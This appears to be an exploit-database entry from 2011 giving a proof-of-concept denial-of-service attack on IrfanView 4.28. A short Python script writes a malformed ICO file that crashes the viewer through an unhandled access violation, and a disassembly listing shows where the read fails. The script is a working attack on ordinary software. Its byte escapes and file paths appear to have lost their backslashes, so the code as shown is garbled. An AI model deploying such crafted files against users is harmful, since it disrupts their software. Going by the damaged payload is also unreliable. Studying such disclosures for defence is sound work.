IrfanView 4.28 - ICO Without Transparent Colour DoS & RDoS

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IrfanView 4.28 - ICO Without Transparent Colour DoS & RDoS
# Published : 2011-04-10
# Author :
# Previous Title : Media Player Classic Home Cinema 1.5.0.2827 AVI DoS PoC
# Next Title : HP Data Protector 6.20 Multiple Vulnerabilities

# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2011.04.07
# published: 2011.04.10
# tested on: Windows XP SP3 Home Edition
# tested on: Windows XP SP3 Professional

# App: IrfanView 4.28
# App Url: http://www.irfanview.com
# i_view32.exe MD5: c6d9383c4119a59aad70dbc4a974b8b4

# DoS is caused by not handled Access Violation Exception in module i_view32.exe

# It can be triggered from:
# Local: C:Without Transparent Colour - DoS.ico
# Remote: \MySecretServerWithout Transparent Colour - DoS.ico

# 004162D0    8B4424 04       MOV EAX,DWORD PTR SS:[ESP+4]
# 004162D4    B2 80           MOV DL,80
# 004162D6    8AC8            MOV CL,AL
# 004162D8    53              PUSH EBX
# 004162D9    80E1 07         AND CL,7
# 004162DC    D2EA            SHR DL,CL
# 004162DE    8B4C24 0C       MOV ECX,DWORD PTR SS:[ESP+C]
# 004162E2    C1E8 03         SHR EAX,3
# 004162E5    8A1C08          MOV BL,BYTE PTR DS:[EAX+ECX]             ; Invalid address -> Access Violation when reading
# 004162E8    22D3            AND DL,BL
# 004162EA    5B              POP EBX
# 004162EB    F6DA            NEG DL
# 004162ED    1BD2            SBB EDX,EDX
# 004162EF    F7DA            NEG EDX
# 004162F1    8BC2            MOV EAX,EDX
# 004162F3    C3              RETN

filepath = "C:\Without Transparent Colour - DoS.ico"
f = open(filepath, "wb")
poc = 'x00x00x01x00x01x00x0Bx0Dx00x00x01x00x18x00x30x02x00x00x16x00x00x00x28x00x00x00xFFx00x00x00x1Ax00x00x00x01x00x18x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x1Ex17x14x1Cx23x14x1Cx23x14x2Dx26x16x1Cx23x14x1Cx23x14x1Cx23x14x35x27x24x36x33x35x2Cx33x4Bx2Cx33x4Bx00x00x00x1Cx23x14x1Cx23x14x1Cx23x14x1Cx23x14x1Cx23x14x3Fx39x48x48x54x67x33x29x34x36x33x35x2Cx33x4Bx44x46x65x00x00x00x36x33x35x56x58x76x64x67x87x35x44x4Dx1Ex17x14x64x67x87x65x78x96x35x27x24x36x33x35x2Cx33x4Bx48x54x67x00x00x00x27x34x33x65x78x96x65x78x96x48x54x67x56x55x67x77x76x98x44x44x56x25x24x24x3Fx39x48x44x44x56x48x54x67x00x00x00x44x44x56x44x46x65x36x33x35x67x66x77x65x59x90x67x66x99x56x55x67x25x24x24x3Fx39x48x44x44x56x44x46x65x00x00x00x77x69xCAx56x58x76x44x35x2Fx77x76x98x76x6Bx98x77x76x98x34x46x2Ex25x26x37x2Cx33x4Bx3Fx39x48x48x54x67x00x00x00x65x59x90x44x44x56x55x49x65x51x47x46x55x56x58x34x46x2Ex36x33x35x36x33x35x2Cx33x4Bx2Cx33x4Bx47x56x76x00x00x00x75x69x88x55x49x65x52x55x8Bx46x43x44x36x33x35x44x44x56x44x44x56x3Fx39x48x3Fx39x48x3Fx39x48x56x58x76x00x00x00x67x66x77x44x44x56x55x49x65x55x49x65x56x58x76x65x59x90x55x49x65x3Fx39x48x33x29x34x3Fx39x48x56x58x76x00x00x00x55x49x65x55x49x65x55x49x65x65x59x90x67x66x99x65x59x90x55x49x65x3Fx39x48x33x29x34x44x44x56x64x67x87x00x00x00x4Fx49x56x55x49x65x55x49x65x56x55x67x65x59x70x64x67x87x56x58x76x3Fx39x48x2Cx33x4Bx44x46x65x54x69x8Cx00x00x00x55x49x65x55x49x65x55x49x65x55x49x65x65x59x90x65x59x90x55x49x7Ax3Fx39x48x3Fx39x48x56x58x76x65x78x96x00x00x00x65x59x90x56x58x76x52x55x8Bx65x59x90x6Cx58xB0x67x66x99x52x55x8Bx3Fx39x48x2Cx33x4Bx56x58x76x77x8FxABx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
f.write(poc)
f.close()

print "Done, 1 file generated on 'C:\' ..."
print "Open this file in IrfanView 4.28 and enjoy ;)"